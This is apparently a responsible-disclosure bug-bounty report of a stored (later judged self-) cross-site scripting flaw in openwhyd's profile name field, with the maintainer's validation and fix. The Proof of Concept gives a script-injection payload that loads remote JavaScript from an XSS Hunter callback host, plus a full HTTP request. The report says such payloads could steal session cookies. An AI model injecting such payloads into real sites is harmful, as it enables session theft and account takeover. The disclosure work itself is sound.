Cross-site Scripting (XSS) - Stored in openwhyd/openwhyd

Valid

Reported on

Oct 17th 2021


Overview

The openwhyd open-source application and openwhyd.org are vulnerable to a stored cross-site scripting vulnerability via user profiles. Malicious users can inject arbitrary javascript into the username setting on their profiles which, when visited by external users, would execute javascript in victim browsers. This is a serious vulnerability and should be triaged immediately to protect users.

Proof of Concept

payload in browser: John Doe "><script src=https://securepoint.xss.ht></script> payload in request: name=john+doe%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fsecurepoint.xss.ht%3E%3C%2Fscript%3E

POST /api/user HTTP/2
Host: openwhyd.org
Cookie: _ga=GA1.2.1710874691.1634429460; _gid=GA1.2.32803653.1634429460; cookieconsent_status=dismiss; whydSid=s%3ACvqf3Q9bbgPSn9TFbSIW5MGlgKrRMxlb.anmicGodGtyIqzLo0BPEXz0c%2BbUxjqptLCOPopLBaQY; _gat=1; _dd_s=rum=1&id=93cf7abc-e858-4a40-bd8c-71ecaa2215b9&created=1634429459651&expire=1634432938003
Content-Length: 147
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://openwhyd.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://openwhyd.org/koassqwh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

name=john+doe%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fsecurepoint.xss.ht%3E%3C%2Fscript%3E&bio=&loc=&lnk_home=&lnk_fb=&lnk_tw=&lnk_sc=&lnk_yt=&lnk_igrm=

Steps to Reproduce

  1. Go to User profile https://openwhyd.org/[username]
  2. Click edit profile then edit profile info
  3. Enter payload into name field. This PoC uses an xsshunter payload to automatically get a call-back of when the payload triggers. The payload used was john doe"><script src=https://securepoint.xss.ht></script>
  4. Save
  5. reload the profile, https://openwhyd.org/[username]
  6. The payload will execute

The vulnerable component is the user profile badge and name field, located at the top right of the page

Impact

This is a severe vulnerability. Malicious users can create profiles with embedded payloads, send links to target victims, and have their arbitrary javascript execute in victim browsers. Payloads could be crafted to steal authentication cookies and session information, such as whydSid, which could lead to complete account takeover.

We have contacted a member of the openwhyd team and are waiting to hear back a year ago
Tyler Butler
a year ago

Researcher


I just noticed, this is apparently a self XSS, the payload executes on https://openwhyd.org/[user] only when that [user] is logged in. The vulnerable component is not used when a victim opens a vulnerable https://openwhyd.org/[user] profile because the component is used as the "logged in" user's avatar. It's still likely the same logic was used elsewhere in the application

Tyler Butler modified the report
a year ago
Adrien Joly validated this vulnerability a year ago
Tyler Butler has been awarded the disclosure bounty
The fix bounty is now up for grabs
Adrien Joly
a year ago

Maintainer


Thank you for reporting, Tyler, and for the precise explanation of the problem + steps to reproduce it! Would you be interested in submitting a fix through a pull request?

Adrien Joly marked this as fixed in 1.45.5 with commit 14e0d4 a year ago
Adrien Joly has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation